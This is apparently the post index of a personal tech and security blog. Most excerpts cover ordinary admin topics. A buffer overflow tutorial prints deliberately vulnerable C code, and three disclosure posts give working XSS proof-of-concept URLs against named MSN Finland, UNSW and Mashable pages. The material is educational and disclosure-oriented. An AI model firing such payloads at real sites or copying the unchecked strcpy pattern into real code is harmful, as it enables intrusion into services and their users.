Fixing Mixed Content warnings using CRONjobs
So if you, like myself, have an HTTPS-only website, you may have noticed that your green bar, green label or security shield (image below) disappears if your webpage fetches an image from another website over HTTP and not HTTPS. Now this isn’t an issue in itself which is why all…read more.
CTF: HACKvent 2015 – Hacking-lab
Hackvent 2015, a capture-the-flag event which runs over the course of December, is about to begin! Click here to sign up and participate!
How to fix your League of Legends Registry Paths (OP.GG fix)
Artist: Awskitee. The issue: If you play League of Legends and use any third-party tools (to record replays, enhance gameplay, among other things :p) then you have probably run into programs that ask for the path of your League of Legends directory. Fortunately, some programs can auto-detect this using the Windows registry. However, if…read more.
WordPress: Regexp and Post Views Counter Plugin
Unfortunately, the WordPress theme I am using did not show any views for each post. While I already had an analytics account, I wanted to display the number of total unique views on my website. I quickly found a plugin called the Post Views Counter by Dfactory. I installed it and configured it so I could…read more.
How to get overall CPU utilization from the bash command line (Linux)
For a little project I worked on, I needed to get the CPU utilization as a percentage. I Googled the issue and searched for “cpu utilization bash”. To my surprise there were no elegant solutions. Most just failed to work (on my machine anyway) while others were very inaccurate. For example, some would show the same number…read more.
How to get an A+ on Qualys SSL Labs Server Test (Apache)
The SSL Server Test by Qualys SSL Labs is an easy way to determine how secure your SSL setup actually is. You can run the test at: https://www.ssllabs.com/ssltest/ This is the score for this domain/server: How to get an A+ score on an Apache HTTP server The default Apache configuration for websites running HTTPS leaves your set…read more.
Simple Buffer Overflow Example
I’m posting this example because the current buffer overflow examples on the web are not that good. This is a step-by-step guide to exploiting a program that is vulnerable to a buffer overflow attack. The Code

    #include <stdio.h>
    #include <string.h>
    #include <stdlib.h>

    int main(int argc, const char *argv[])
    {
        if (argc != 2) {
            printf("Usage: %s <text>", argv[0]);
            exit(1);
        }

        char buf[1024];
        /* Deliberately vulnerable: strcpy() does not check that argv[1] fits in buf. */
        strcpy(buf, argv[1]);
        printf("You wrote:\n%s\n", buf);

        return 0;
    }

This is the vulnerable code that we will be attacking. In this case, the…read more.
Finland MSN XSS Vulnerability
The search bar on this page fails to encode double quotes ("), and as a result an onMouseOver event handler can be attached to the search bar, which allows an XSS attack to occur. Code:

    http://ideakeittio.fi.msn.com/ruokaohjehaku/
    ?q=" onMouseOver=alert(/XSS/) "
    &mealtypes=suolaiset
    &mealtypes=leivonta-2
    &main_ingredient=1

CSE.UNSW.EDU.AU XSS Vulnerability
The staff search page does not sanitise the input of the ID field, allowing an XSS attack to be executed. Code:

    http://www.cse.unsw.edu.au/db/staff/staff.php
    ?ID="><script>prompt(42)</script>

Mashable XSS Vulnerability
The Mashable subscription script fails to sanitise the email field and prints the invalid email on an error page. Code:

    http://mashable.com/follow/subscriptions/
    ?email="><script>alert(1)</script>
    &fingerprint=be0c8a1f226d1d986340c66ca8d701fffbd1f644